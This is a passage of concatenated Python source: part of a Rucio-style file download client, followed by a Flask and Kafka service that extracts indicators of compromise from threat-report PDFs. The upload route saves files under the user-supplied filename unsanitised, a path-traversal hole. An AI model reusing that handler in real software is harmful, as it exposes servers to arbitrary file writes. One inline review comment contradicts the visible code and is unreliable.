                trace['transferStart'] = start_time
                trace['transferEnd'] = end_time

                # ensure file exists
                status = dlinfo.get('status', '').lower()
                if status == 'complete' and os.path.isfile(temp_file_path):
                    # checksum check; 0 == 0 makes the comparison succeed when skipped
                    skip_check = item.get('ignore_checksum', False)
                    rucio_checksum = 0 if skip_check else item.get('adler32')
                    local_checksum = 0 if skip_check else adler32(temp_file_path)
                    if rucio_checksum == local_checksum:
                        item['clientState'] = 'DONE'
                        trace['clientState'] = 'DONE'
                        # remove .part ending
                        os.rename(temp_file_path, dest_file_path)

                        # calculate duration
                        duration = round(end_time - start_time, 2)
                        duration = max(duration, 0.01)  # protect against 0 division
                        size = item.get('bytes', 0)
                        rate = round((size / duration) * 1e-6, 2)
                        size_str = sizefmt(size, self.is_human_readable)
                        logger(logging.INFO, 'File %s successfully downloaded. %s in %s seconds = %s MBps' % (file_did_str,
                                                                                                              size_str,
                                                                                                              duration,
                                                                                                              rate))
                    else:
                        os.unlink(temp_file_path)
                        logger(logging.WARNING, 'Checksum validation failed for file: %s' % file_did_str)
                        logger(logging.DEBUG, 'Local checksum: %s, Rucio checksum: %s' % (local_checksum, rucio_checksum))
                        item['clientState'] = 'FAIL_VALIDATE'
                        trace['clientState'] = 'FAIL_VALIDATE'
                else:
                    logger(logging.ERROR, 'Failed to download file: %s' % file_did_str)
                    logger(logging.DEBUG, 'Aria2c status: %s' % status)
                    item['clientState'] = 'FAILED'
                    trace['clientState'] = 'DOWNLOAD_ATTEMPT'

                self._send_trace(trace)
                del item['trace']

                # tell aria2c to forget the finished download and stop tracking it
                aria_rpc.aria2.removeDownloadResult(rpc_auth, gid)
                del gid_to_item[gid]

            if len(stopped) > 0:
                logger(logging.INFO, 'Active: %d, Waiting: %d, Stopped: %d' % (num_active, num_waiting, num_stopped))

        return items

    def _resolve_and_merge_input_items(self, items):
        """
        This function takes the input items given to download_dids etc.
        and merges them respecting their individual options.
        This way functions can operate on these items in batch mode. E.g.,
        list_replicas calls are reduced.

        :param items: List of dictionaries.
        Each dictionary describing an input item

        :returns: a dictionary with a dictionary that maps the input DIDs to options
                  and a list with a dictionary for each merged download item

        :raises InputValidationError: if one of the input items is in the wrong format
        """
        logger = self.logger

        # check mandatory options before doing any server calls
        for item in items:
            if item.get('resolve_archives') is not None:
                logger(logging.WARNING, 'resolve_archives option is deprecated and will be removed in a future release.')
                item.setdefault('no_resolve_archives', not item.pop('resolve_archives'))

            did = item.get('did', [])
            if len(did) == 0:
                # no DID given: a filter with at least a scope is mandatory instead
                if not item.get('filters', {}).get('scope'):
                    logger(logging.DEBUG, item)
                    raise InputValidationError('Item without did and filter/scope')
                item['did'] = [None]
            elif not isinstance(did, list):
                item['did'] = [did]

        # items whose values for these keys all match are merged into one
        # list_replicas call
        distinct_keys = ['rse', 'force_scheme', 'nrandom']
        all_resolved_did_strs = set()

        did_to_options = {}
        merged_items = []
        download_info = {'did_to_options': did_to_options, 'merged_items': merged_items}

        while len(items) > 0:
            item = items.pop()

            filters = item.get('filters', {})
            item_dids = item.pop('did')
            if item_dids[0] is None:
                logger(logging.DEBUG, 'Resolving DIDs by using filter options')
                item_dids = []
                scope = filters.pop('scope')
                for did_name in self.client.list_dids(scope, filters=filters, type='all'):
                    item_dids.append('%s:%s' % (scope, did_name))

            # per-item options that are folded into the per-DID options below
            base_dir = item.pop('base_dir', '.')
            no_subdir = item.pop('no_subdir', False)
            ignore_checksum = item.pop('ignore_checksum', False)
            new_transfer_timeout = item.pop('transfer_timeout', None)
            resolved_dids = item.setdefault('dids', [])
            for did_str in item_dids:
                did_scope, did_name = self._split_did_str(did_str)
                tmp_did_names = []
                if '*' in did_name:
                    # wildcard in the name: expand it via a server-side listing
                    filters['name'] = did_name
                    tmp_did_names = list(self.client.list_dids(did_scope, filters=filters, type='all'))
                else:
                    tmp_did_names = [did_name]

                for did_name in tmp_did_names:
                    resolved_did_str = '%s:%s' % (did_scope, did_name)
                    options = did_to_options.setdefault(resolved_did_str, {})
                    # destinations accumulate across items even for duplicate DIDs
                    options.setdefault('destinations', set()).add((base_dir, no_subdir))

                    if resolved_did_str in all_resolved_did_strs:
                        # in this case the DID was already given in another item
                        # the options of this DID will be ignored and the options of the first item that contained the DID will be used
                        # another approach would be to compare the options and apply the more relaxed options
                        logger(logging.DEBUG, 'Ignoring further options of DID: %s' % resolved_did_str)
                        continue

                    options['ignore_checksum'] = (options.get('ignore_checksum') or ignore_checksum)

                    # keep the larger of the two timeouts when both are given
                    cur_transfer_timeout = options.setdefault('transfer_timeout', None)
                    if cur_transfer_timeout is not None and new_transfer_timeout is not None:
                        options['transfer_timeout'] = max(int(cur_transfer_timeout), int(new_transfer_timeout))
                    elif new_transfer_timeout is not None:
                        options['transfer_timeout'] = int(new_transfer_timeout)

                    resolved_dids.append({'scope': did_scope, 'name': did_name})
                    all_resolved_did_strs.add(resolved_did_str)

            if len(resolved_dids) == 0:
                logger(logging.WARNING, 'An item didnt have any DIDs after resolving the input. Ignoring it.')
                logger(logging.DEBUG, item)
                continue

            # merge into an existing item if all distinct_keys match
            was_merged = False
            for merged_item in merged_items:
                if all(item.get(k) == merged_item.get(k) for k in distinct_keys):
                    merged_item['dids'].extend(resolved_dids)
                    was_merged = True
                    break
            if not was_merged:
                item['dids'] = resolved_dids
                merged_items.append(item)
        return download_info

    def _get_sources(self, merged_items, resolve_archives=True):
        """
        Get sources (PFNs) of the DIDs.

        :param merged_items: list of dictionaries. Each dictionary describes a bunch of DIDs to download

        :returns: list of list of dictionaries.
""" logger = self.logger merged_items_with_sources = [] # if excluding tapes, we need to list them first tape_rses = [] if self.is_tape_excluded: try: tape_rses = [endp['rse'] for endp in self.client.list_rses(rse_expression='istape=true')] except: logger(logging.DEBUG, 'No tapes found.') for item in merged_items: # since we're using metalink we need to explicitly give all schemes schemes = item.get('force_scheme') if schemes: schemes = schemes if isinstance(schemes, list) else [schemes] logger(logging.DEBUG, 'schemes: %s' % schemes) # RSE expression, still with tape endpoints included rse_expression = item.get('rse') logger(logging.DEBUG, 'rse_expression: %s' % rse_expression) # get PFNs of files and datasets logger(logging.DEBUG, 'num DIDs for list_replicas call: %d' % len(item['dids'])) metalink_str = self.client.list_replicas(item['dids'], schemes=schemes, rse_expression=rse_expression, client_location=self.client_location, resolve_archives=resolve_archives, resolve_parents=True, metalink=True) file_items = parse_replicas_from_string(metalink_str) logger(logging.DEBUG, 'num resolved files: %s' % len(file_items)) # list_replicas returns nothing if the DID does not exist and we dont want to # do another server call so we check if there is a result from list_replicas # for each given DID. If not the DID does not exist for input_did in item['dids']: input_did = DIDType(input_did) if not any([input_did == f['did'] or str(input_did) in f['parent_dids'] for f in file_items]): logger(logging.ERROR, 'DID does not exist: %s' % input_did) # TODO: store did directly as DIDType object file_items.append({'did': str(input_did), 'adler32': None, 'md5': None, 'sources': [], 'parent_dids': set()}) # filtering out tape sources if self.is_tape_excluded: for item in file_items: sources = item['sources'] for src in item['sources']: if src in tape_rses: sources.remove(src) if not sources: logger(logging.WARNING, 'Requested did {} has only replicas on tape. 
No files will be download.'.format(item['did'])) nrandom = item.get('nrandom') if nrandom: logger(logging.INFO, 'Selecting %d random replicas from DID(s): %s' % (nrandom, item['dids'])) random.shuffle(file_items) file_items = file_items[0:nrandom] merged_items_with_sources.append(file_items) else: merged_items_with_sources.append(file_items) return merged_items_with_sources def _prepare_items_for_download(self, did_to_options, merged_items_with_sources, resolve_archives=True): """ Optimises the amount of files to download (This function is meant to be used as class internal only) :param did_to_options: dictionary that maps each input DID to some input options :param merged_items_with_sources: list of dictionaries. Each dictionary describes a bunch of DIDs to download :returns: list of dictionaries. Each dictionary describes an element to download :raises InputValidationError: if the given input is not valid or incomplete """ logger = self.logger if resolve_archives: # perhaps we'll need an extraction tool so check what is installed self.extraction_tools = [tool for tool in self.extraction_tools if tool.is_useable()] if len(self.extraction_tools) < 1: logger(logging.WARNING, 'Archive resolution is enabled but no extraction tool is available. 
                                      'Sources whose protocol doesnt support extraction wont be considered for download.')

        # maps file item IDs (fiid) to the file item object
        fiid_to_file_item = {}
        # list of all file item objects
        all_file_items = []
        # cea -> client_extract archives to avoid confusion with archives that dont need explicit extraction
        # this dict will contain all ids of cea's that definitely will be downloaded
        cea_id_pure_to_fiids = {}
        # this dict will contain ids of cea's that have higher prioritised non cea sources
        cea_id_mixed_to_fiids = {}

        all_input_dids = set(did_to_options.keys())
        all_dest_file_paths = set()

        # get replicas for every file of the given dids
        for file_items in merged_items_with_sources:
            all_file_items.extend(file_items)
            for file_item in file_items:
                # parent_dids contains all parents, so we take the intersection with the input dids
                dataset_did_strs = file_item.setdefault('parent_dids', set())
                dataset_did_strs.intersection_update(all_input_dids)

                file_did_str = file_item['did']
                file_did_scope, file_did_name = self._split_did_str(file_did_str)
                file_item['scope'] = file_did_scope
                file_item['name'] = file_did_name

                logger(logging.DEBUG, 'Queueing file: %s' % file_did_str)
                logger(logging.DEBUG, 'real parents: %s' % dataset_did_strs)
                logger(logging.DEBUG, 'options: %s' % did_to_options)

                # prepare destinations:
                # if datasets were given: prepare the destination paths for each dataset
                options = None
                dest_file_paths = file_item.get('dest_file_paths', set())
                for dataset_did_str in dataset_did_strs:
                    options = did_to_options.get(dataset_did_str)
                    if not options:
                        logger(logging.ERROR, 'No input options available for %s' % dataset_did_str)
                        continue

                    destinations = options['destinations']
                    dataset_scope, dataset_name = self._split_did_str(dataset_did_str)
                    paths = [os.path.join(self._prepare_dest_dir(dest[0], dataset_name, dest[1]), file_did_name) for dest in destinations]
                    if any(path in all_dest_file_paths for path in paths):
                        raise RucioException("Multiple file items with same destination file path")

                    all_dest_file_paths.update(paths)
                    dest_file_paths.update(paths)

                    # workaround: just take any given dataset for the traces and the output
                    file_item.setdefault('dataset_scope', dataset_scope)
                    file_item.setdefault('dataset_name', dataset_name)

                # if no datasets were given only prepare the given destination paths
                if len(dataset_did_strs) == 0:
                    options = did_to_options.get(file_did_str)
                    if not options:
                        logger(logging.ERROR, 'No input options available for %s' % file_did_str)
                        continue

                    destinations = options['destinations']
                    paths = [os.path.join(self._prepare_dest_dir(dest[0], file_did_scope, dest[1]), file_did_name) for dest in destinations]
                    if any(path in all_dest_file_paths for path in paths):
                        raise RucioException("Multiple file items with same destination file path")

                    all_dest_file_paths.update(paths)
                    dest_file_paths.update(paths)

                if options is None:
                    # no destination could be derived; the item is skipped entirely
                    continue

                file_item['merged_options'] = options
                file_item['dest_file_paths'] = list(dest_file_paths)
                file_item['temp_file_path'] = '%s.part' % file_item['dest_file_paths'][0]

                # the file did str ist not an unique key for this dict because multiple calls of list_replicas
                # could result in the same DID multiple times. So we're using the id of the dictionary objects
                fiid = id(file_item)
                fiid_to_file_item[fiid] = file_item

                if resolve_archives:
                    min_cea_priority = None
                    num_non_cea_sources = 0
                    cea_ids = []
                    sources = []
                    # go through sources and check how many (non-)cea sources there are,
                    # index cea sources, or remove cea sources if there is no extraction tool
                    for source in file_item['sources']:
                        is_cea = source.get('client_extract', False)
                        if is_cea and (len(self.extraction_tools) > 0):
                            priority = int(source['priority'])
                            if min_cea_priority is None or priority < min_cea_priority:
                                min_cea_priority = priority

                            # workaround since we dont have the archive DID use the part behind the last slash of the PFN
                            # this doesn't respect the scope of the archive DID!!!
                            # and we trust that client_extract==True sources dont have any parameters at the end of the PFN
                            cea_id = source['pfn'].split('/')
                            cea_id = cea_id[-1] if len(cea_id[-1]) > 0 else cea_id[-2]
                            cea_ids.append(cea_id)

                            sources.append(source)
                        elif not is_cea:
                            num_non_cea_sources += 1
                            sources.append(source)
                        else:
                            # no extraction tool
                            logger(logging.DEBUG, 'client_extract=True; ignoring source: %s' % source['pfn'])

                    logger(logging.DEBUG, 'Prepared sources: num_sources=%d/%d; num_non_cea_sources=%d; num_cea_ids=%d'
                           % (len(sources), len(file_item['sources']), num_non_cea_sources, len(cea_ids)))

                    file_item['sources'] = sources

                    # if there are no cea sources we are done for this item
                    if min_cea_priority is None:
                        continue
                    # decide if file item belongs to the pure or mixed map
                    # if no non-archive src exists or the highest prio src is an archive src we put it in the pure map
                    elif num_non_cea_sources == 0 or min_cea_priority == 1:
                        logger(logging.DEBUG, 'Adding fiid to cea pure map: '
                                              'num_non_cea_sources=%d; min_cea_priority=%d; num_cea_sources=%d'
                               % (num_non_cea_sources, min_cea_priority, len(cea_ids)))
                        for cea_id in cea_ids:
                            cea_id_pure_to_fiids.setdefault(cea_id, set()).add(fiid)
                            file_item.setdefault('cea_ids_pure', set()).add(cea_id)
                    # if there are non-archive sources and archive sources we put it in the mixed map
                    elif len(cea_ids) > 0:
                        logger(logging.DEBUG, 'Adding fiid to cea mixed map: '
                                              'num_non_cea_sources=%d; min_cea_priority=%d; num_cea_sources=%d'
                               % (num_non_cea_sources, min_cea_priority, len(cea_ids)))
                        for cea_id in cea_ids:
                            cea_id_mixed_to_fiids.setdefault(cea_id, set()).add(fiid)
                            file_item.setdefault('cea_ids_mixed', set()).add(cea_id)

        # put all archives from the mixed list into the pure list if they meet
        # certain conditions, e.g., an archive that is already in the pure list
        for cea_id_mixed in list(cea_id_mixed_to_fiids.keys()):
            fiids_mixed = cea_id_mixed_to_fiids[cea_id_mixed]
            if cea_id_mixed in cea_id_pure_to_fiids:
                # file from mixed list is already in a pure list
                logger(logging.DEBUG, 'Mixed ID is already in cea pure map: '
                                      'cea_id_mixed=%s; num_fiids_mixed=%d; num_cea_pure_fiids=%d'
                       % (cea_id_mixed, len(fiids_mixed), len(cea_id_pure_to_fiids[cea_id_mixed])))
            elif len(fiids_mixed) >= self.use_cea_threshold:
                # more than use_cea_threshold files are in a common archive
                logger(logging.DEBUG, 'Number of needed files in cea reached threshold: '
                                      'cea_id_mixed=%s; num_fiids_mixed=%d; threshold=%d'
                       % (cea_id_mixed, len(fiids_mixed), self.use_cea_threshold))
            else:
                # dont move from mixed list to pure list
                continue

            # first add cea_id to pure map so it can be removed from mixed map later
            cea_id_pure_to_fiids.setdefault(cea_id_mixed, set()).update(fiids_mixed)

            # now update all file_item mixed/pure maps
            for fiid_mixed in list(fiids_mixed):
                file_item = fiid_to_file_item[fiid_mixed]
                # add cea id to file_item pure map
                file_item.setdefault('cea_ids_pure', set()).add(cea_id_mixed)
                # remove file item mixed map and
                # remove references from all other mixed archives to file_item
                for cea_id_mixed2 in file_item.pop('cea_ids_mixed'):
                    cea_id_mixed_to_fiids[cea_id_mixed2].remove(fiid_mixed)

            # finally remove cea_id from mixed map
            cea_id_mixed_to_fiids.pop(cea_id_mixed)

        # a file with a pure archive downloads only from archives; a file with
        # only mixed archives downloads only from its non-archive sources
        for file_item in all_file_items:
            cea_ids_pure = file_item.get('cea_ids_pure', set())
            cea_ids_mixed = file_item.get('cea_ids_mixed', set())

            if len(cea_ids_pure) > 0:
                logger(logging.DEBUG, 'Removing all non-cea sources of file %s' % file_item['did'])
                file_item['sources'] = [s for s in file_item['sources'] if s.get('client_extract', False)]
            elif len(cea_ids_mixed) > 0:
                logger(logging.DEBUG, 'Removing all cea sources of file %s' % file_item['did'])
                file_item['sources'] = [s for s in file_item['sources'] if not s.get('client_extract', False)]

        # reduce the amount of archives to download by removing
        # all redundant pure archives (=all files can be extracted from other archives)
        for cea_id_pure in list(cea_id_pure_to_fiids.keys()):
            # if all files of this archive are available in more than one archive the archive is redundant
            if all(len(fiid_to_file_item[fiid_pure]['cea_ids_pure']) > 1 for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]):
                for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]:
                    fiid_to_file_item[fiid_pure]['cea_ids_pure'].discard(cea_id_pure)
                logger(logging.DEBUG, 'Removing redundant archive %s' % cea_id_pure)
                cea_id_pure_to_fiids.pop(cea_id_pure)

        # remove all archives of a file except a single one so
        # that each file is assigned to exactly one pure archive
        for cea_id_pure in cea_id_pure_to_fiids:
            for fiid_pure in cea_id_pure_to_fiids[cea_id_pure]:
                cea_ids_pure = fiid_to_file_item[fiid_pure]['cea_ids_pure']

                for cea_id_pure_other in list(cea_ids_pure):
                    if cea_id_pure != cea_id_pure_other:
                        cea_id_pure_to_fiids[cea_id_pure_other].discard(fiid_pure)
                        cea_ids_pure.discard(cea_id_pure_other)

        # finally build the download packs: one pack per archive (its member
        # files become archive_items) plus one pack per plain file
        download_packs = []
        cea_id_to_pack = {}
        for file_item in all_file_items:
            cea_ids = file_item.get('cea_ids_pure', set())
            if len(cea_ids) > 0:
                cea_id = next(iter(cea_ids))
                pack = cea_id_to_pack.get(cea_id)
                if pack is None:
                    scope = file_item['scope']
                    first_dest = next(iter(file_item['merged_options']['destinations']))
                    dest_path = os.path.join(self._prepare_dest_dir(first_dest[0], scope, first_dest[1]), cea_id)
                    pack = {'scope': scope,
                            'name': cea_id,
                            'dest_file_paths': [dest_path],
                            'temp_file_path': '%s.part' % dest_path,
                            'sources': file_item['sources'],
                            'merged_options': {'ignore_checksum': True},  # we currently dont have checksums for the archive
                            'archive_items': []
                            }
                    cea_id_to_pack[cea_id] = pack
                    download_packs.append(pack)
                file_item.pop('sources')
                pack['archive_items'].append(file_item)
            else:
                download_packs.append(file_item)
        return download_packs

    def _split_did_str(self, did_str):
        """
        Splits a given DID string (e.g.
'scope1:name.file') into its scope and name part (This function is meant to be used as class internal only) :param did_str: the DID string that will be splitted :returns: the scope- and name part of the given DID :raises InputValidationError: if the given DID string is not valid """ did = did_str.split(':') if len(did) == 2: did_scope = did[0] did_name = did[1] elif len(did) == 1: did = did_str.split('.') did_scope = did[0] if did_scope == 'user' or did_scope == 'group': did_scope = '%s.%s' % (did[0], did[1]) did_name = did_str else: raise InputValidationError('%s is not a valid DID. To many colons.' % did_str) if did_name.endswith('/'): did_name = did_name[:-1] return did_scope, did_name @staticmethod def _prepare_dest_dir(base_dir, dest_dir_name, no_subdir): """ Builds the final destination path for a file and creates the destination directory if it's not existent. (This function is meant to be used as class internal only) :param base_dir: base directory part :param dest_dir_name: name of the destination directory :param no_subdir: if no subdirectory should be created :returns: the absolut path of the destination directory """ # append dest_dir_name, if subdir should be used dest_dir_path = os.path.join(os.path.abspath(base_dir), '' if no_subdir else dest_dir_name) if not os.path.isdir(dest_dir_path): os.makedirs(dest_dir_path) return dest_dir_path def _check_output(self, output_items): """ Checks if all files were successfully downloaded (This function is meant to be used as class internal only) :param output_items: list of dictionaries describing the downloaded files :returns: output_items list :raises NoFilesDownloaded: :raises NotAllFilesDownloaded: """ success_states = ['ALREADY_DONE', 'DONE', 'FOUND_IN_PCACHE'] # failure_states = ['FILE_NOT_FOUND', 'FAIL_VALIDATE', 'FAILED'] num_successful = 0 num_failed = 0 for item in output_items: clientState = item.get('clientState', 'FAILED') if clientState in success_states: num_successful += 1 else: num_failed += 1 
        if num_successful == 0:
            raise NoFilesDownloaded()
        elif num_failed > 0:
            raise NotAllFilesDownloaded()

        return output_items

    def _send_trace(self, trace):
        """
        Checks if sending trace is allowed and send the trace.

        :param trace: the trace
        """
        # self.tracing acts as a global opt-out switch for client telemetry
        if self.tracing:
            send_trace(trace, self.client.host, self.client.user_agent)

    def _verify_checksum(item, path):
        # NOTE(review): this def has no `self` parameter and no @staticmethod
        # decorator — if it is meant to be a class member it only works when
        # accessed via the class object; confirm whether it should be moved to
        # module level or decorated with @staticmethod.
        """
        Compare the local file at *path* against the checksums stored in *item*.

        Tries the preferred checksum algorithm first and falls back to any
        other globally supported algorithm for which *item* carries a value.

        :param item: dictionary possibly containing checksum values per algorithm
        :param path: path of the local file to verify

        :returns: tuple (matched, rucio_checksum, local_checksum);
                  (False, None, None) if no usable checksum was found
        """
        rucio_checksum = item.get(PREFERRED_CHECKSUM)
        local_checksum = None
        checksum_algo = CHECKSUM_ALGO_DICT.get(PREFERRED_CHECKSUM)

        if rucio_checksum and checksum_algo:
            local_checksum = checksum_algo(path)
            return rucio_checksum == local_checksum, rucio_checksum, local_checksum

        # preferred algorithm unavailable: fall back to any supported one
        for checksum_name in GLOBALLY_SUPPORTED_CHECKSUMS:
            rucio_checksum = item.get(checksum_name)
            checksum_algo = CHECKSUM_ALGO_DICT.get(checksum_name)

            if rucio_checksum and checksum_algo:
                local_checksum = checksum_algo(path)
                return rucio_checksum == local_checksum, rucio_checksum, local_checksum

        return False, None, None
# ==== server.py ====
''' Server-Class for the extractions of IoC's. '''
# pylint: disable=C0413, C0411
import os
import sys
import json
import pytz
import re
import iocextract as ioce
sys.path.append('..')
from io import StringIO
from threading import Thread
from kafka.producer import KafkaProducer
from kafka.consumer import KafkaConsumer
from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfdocument import PDFDocument
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.pdfpage import PDFPage
from pdfminer.pdfparser import PDFParser
from ioc_finder import find_iocs
from flask import Flask
from flask import request
from flask import render_template
from flask_script import Server
from flask_apscheduler import APScheduler
from flask_dropzone import Dropzone
from libs.core.filter import filter_dict_values
from libs.core.filter import filter_by_blacklist
from libs.core.merge_dicts import merge_dicts
from libs.core.environment import envvar
from libs.kafka.topichandler import create_topic_if_not_exists
from libs.kafka.logging import LogMessage
from libs.kafka.logging import send_health_message
from libs.extensions.loader import load_extensions
from libs.gitlabl.files import read_file_from_gitlab
from libs.gitlabl.sanitize_title import sanitize_title
from libs.text_summarization.tsummarization import summarize
import traceback

# ENVIRONMENT-VARS
# Every value can be overridden from the environment; the second argument
# is only a development fallback.
SERVICENAME = envvar("SERVICENAME", "Extractor")
IOC_TOPIC_NAME = envvar("IOC_TOPIC", "ioc")
SCRAPER_TOPIC_NAME = envvar("SCRAPER_TOPIC", "datascraper")  # nosec
KAFKA_SERVER = envvar("KAFKA_SERVER", "0.0.0.0:9092")
HEALTHTOPIC = envvar("HEALTH_TOPIC", "health_report")  # nosec
GITLAB_SERVER = envvar("GITLAB_SERVER", "0.0.0.0:10082")
GITLAB_TOKEN = envvar("GITLAB_TOKEN", "NOTWORKING")
GITLAB_REPO_NAME = envvar("GITLAB_REPO_NAME", "IOCFindings")

# Directory watched for uploaded PDF reports inside the container.
DOCKER_REPORTS_PATH = "/app/iocextractor/reports"


class Config:
    '''
    Config class with configs for flask.
    '''
    SCHEDULER_API_ENABLED = True


app = Flask(SERVICENAME, template_folder='templates', static_folder="static/", static_url_path='/static')
app.config.from_object(Config())
# Dropzone upload restrictions: PDFs only, max 10 MB each, up to 100 files.
app.config['DROPZONE_ALLOWED_FILE_CUSTOM'] = True
app.config['DROPZONE_ALLOWED_FILE_TYPE'] = '.pdf'
app.config['DROPZONE_MAX_FILE_SIZE'] = 10
app.config['DROPZONE_MAX_FILES'] = 100
app.config['UPLOADED_PATH'] = os.path.join(DOCKER_REPORTS_PATH, 'uploads')

dropzone = Dropzone(app)

scheduler = APScheduler()
scheduler.init_app(app)


def flaskapp():
    '''
    flaskapp will return the FLASK_APP.
    @return a flask_app
    '''
    return app


class Extractor(Server):
    '''
    Extractor will be the class for the extractor-server.
    '''

    # Regex-based extraction extensions loaded once at import time.
    EXTENSIONS = load_extensions(SERVICENAME)
    # Blacklist used to filter findings; refreshed periodically from gitlab.
    BLACKLIST = {}

    @app.route('/', methods=['GET', 'POST'])
    def file_dropzone():
        '''
        file_dropzone will render a drag and drop view for the reports.
        @return a rendered template.
        '''
        if request.method == 'POST':
            files = request.files.get('file')
            file_path = os.path.join(DOCKER_REPORTS_PATH, files.filename)
            files.save(file_path)
        return render_template('index.html')

    @staticmethod
    @scheduler.task("interval", id="refetch", seconds=30, timezone=pytz.UTC)
    def refetch_blacklist():
        '''
        refetch_blacklist will fetch the blacklist from the master every 30 seconds.
''' content = {} try: if Extractor.BLACKLIST is None or len(Extractor.BLACKLIST) <= 0: LogMessage("Using local blacklist.", LogMessage.LogTyp.INFO, SERVICENAME).log() with open(os.path.abspath("../datasets/blacklist.json")) as content: content = json.load(content) else: LogMessage("Using blacklist from gitlab.", LogMessage.LogTyp.INFO, SERVICENAME).log() content = read_file_from_gitlab(gitlabserver=GITLAB_SERVER, token=GITLAB_TOKEN, repository=GITLAB_REPO_NAME, file="blacklist.json", servicename=SERVICENAME, branch_name="master") content = json.loads(content) if content is not None: Extractor.BLACKLIST = content except Exception as error: LogMessage(str(error), LogMessage.LogTyp.ERROR, SERVICENAME).log() @staticmethod def pushfindings(findings): ''' pushfindings will push all findings to KAFKA. @param findings will be the findings. ''' try: producer = KafkaProducer(bootstrap_servers=KAFKA_SERVER, client_id='ioc_extractor', api_version=(2, 7, 0)) message = str(json.dumps(findings)).encode('UTF-8') producer.send(IOC_TOPIC_NAME, message) except Exception as error: LogMessage(str(error), LogMessage.LogTyp.ERROR, SERVICENAME).log() @staticmethod def extensions(string): ''' extensions will execute extensions for this server. @param string will be the string to check against. @return findings in the string machting the extensions-rules. ''' findings = {} try: for i in Extractor.EXTENSIONS: try: l_findings = re.findall(i.get_pattern(), string) if len(l_findings) > 0 and isinstance(l_findings[0], tuple): findings[str(i.field)] = [ element[i.get_group()] if len(element) - 1 >= i.get_group() else element.group(0) for element in l_findings] else: findings[str(i.field)] = l_findings except Exception as error: LogMessage(str(error), LogMessage.LogTyp.ERROR, SERVICENAME).log() except Exception as error: LogMessage(str(error), LogMessage.LogTyp.ERROR, SERVICENAME).log() return findings def extract_ioc(pdftext): ''' extract_ioc will extract ioc from a given text all ioc. 
@param pdftext will be the text to search trough. @return will return a dictonary with all icos or an empty dict incase of no ioc or an error. ''' iocs = {} try: iocs = find_iocs(pdftext) urls = [rule for rule in ioce.extract_urls(pdftext, refang=True)] iocs['urls'] = list(dict.fromkeys(urls)) yara_rules = [rule for rule in ioce.extract_yara_rules(pdftext)] iocs['yara_rules'] = yara_rules if len(pdftext) > 200: iocs['textsummary'] = summarize(pdftext, SERVICENAME) ex_ioc = Extractor.extensions(pdftext) iocs = merge_dicts(iocs, filter_dict_values(ex_ioc, SERVICENAME), SERVICENAME) iocs = filter_by_blacklist(iocs, Extractor.BLACKLIST, SERVICENAME) except Exception as error: LogMessage(f"{str(error)} {''.join(traceback.format_tb(error.__traceback__))}", LogMessage.LogTyp.ERROR, SERVICENAME).log() return iocs @staticmethod def extract(reportpath): ''' extract will take a PDF-File as path and try to extract all IoC's. After the Extraction, the file will be removed. The IoC's will be pushed to KAFKA by calling the pushfindings-Function. @param reportpath will be the path to the PDF-File. 
        Note (review): the enclosing `def extract(reportpath)` header and the
        opening of this docstring lie outside the visible chunk; only the
        tail of the method appears below. Presumably a @staticmethod like its
        siblings — TODO confirm against the full file.
        '''
        try:
            # Accumulate the text of every PDF page into an in-memory buffer.
            pdf_content = StringIO()
            LogMessage(f"Extract ioc's from file: {reportpath}", LogMessage.LogTyp.INFO, SERVICENAME).log()
            with open(reportpath, 'rb') as file:
                resource_manager = PDFResourceManager()
                device = TextConverter(resource_manager, pdf_content, laparams=LAParams())
                interpreter = PDFPageInterpreter(resource_manager, device)
                for page in PDFPage.create_pages(PDFDocument(PDFParser(file))):
                    interpreter.process_page(page)
                pdftext = pdf_content.getvalue()
            # Pull IoCs out of the extracted text and publish the findings.
            iocs = Extractor.extract_ioc(pdftext)
            input_filename = sanitize_title(unsanitized_title=str((os.path.basename(reportpath))), servicename=SERVICENAME)
            iocs['input_filename'] = input_filename
            Extractor.pushfindings(iocs)
            # The report file is consumed exactly once, then deleted.
            os.remove(reportpath)
            LogMessage(f"The ioc's had been extracted from the file and the file has been removed: {reportpath}", LogMessage.LogTyp.INFO, SERVICENAME).log()
        except Exception as error:
            # Broad catch: one bad report must not kill the worker thread.
            LogMessage(str(error), LogMessage.LogTyp.ERROR, SERVICENAME).log()

    @scheduler.task("interval", id="health_push", seconds=5, timezone=pytz.UTC)
    def healthpush():
        '''
        healthpush will send a health message to KAFKA.

        Runs every 5 seconds via the scheduler and reports service liveness
        on the health topic.
        '''
        try:
            send_health_message(KAFKA_SERVER, HEALTHTOPIC, SERVICENAME)
        except Exception as error:
            LogMessage(str(error), LogMessage.LogTyp.ERROR, SERVICENAME).log()

    @staticmethod
    def handle_scraper_feed(data):
        '''
        handle_scraper_feed take the data from scraper and extract all ioc
        and push the result to KAFKA for the ioc pusher.

        @param data will be the data from KAFKA; its ``value`` attribute is
               UTF-8 encoded JSON — presumably with 'content' and 'title'
               keys (TODO confirm against the scraper producer).
        '''
        try:
            if (json_data := json.loads(data.value.decode("utf-8"))) is not None:
                iocs = Extractor.extract_ioc(json_data.get('content'))
                # Only publish when at least one IoC was found.
                if iocs is not None and len(iocs) > 0:
                    input_filename = sanitize_title(unsanitized_title=str(json_data.get('title')), servicename=SERVICENAME)
                    iocs['input_filename'] = input_filename
                    Extractor.pushfindings(iocs)
        except Exception as error:
            LogMessage(str(error), LogMessage.LogTyp.ERROR, SERVICENAME).log()

    @staticmethod
    def consume_findings_from_scraper():
        '''
        consume_findings_from_scraper will consume all records from the
        scraper KAFKA topic and hand each one to handle_scraper_feed on its
        own daemon thread.
        '''
        try:
            consumer = KafkaConsumer(SCRAPER_TOPIC_NAME,
                                     bootstrap_servers=KAFKA_SERVER,
                                     client_id='ioc_extractor',
                                     api_version=(2, 7, 0),
                                     )
            # Blocks forever: iterating a KafkaConsumer yields records as they arrive.
            for report in consumer:
                Thread(target=Extractor.handle_scraper_feed, args=(report,), daemon=True).start()
        except Exception as error:
            LogMessage(str(error), LogMessage.LogTyp.ERROR, SERVICENAME).log()

    @scheduler.task("interval", id="execute", seconds=10, timezone=pytz.UTC, misfire_grace_time=900)
    def execute():
        '''
        execute will run the service and search for PDF's and start for every
        file a thread. The thread will execute the extract-Function and
        extract all IoC's in a file.
        '''
        try:
            if (reports := os.listdir(DOCKER_REPORTS_PATH)) is not None and len(reports) > 0:
                threads = []
                # One worker thread per PDF report found in the drop directory.
                for report in reports:
                    if report.endswith(".pdf"):
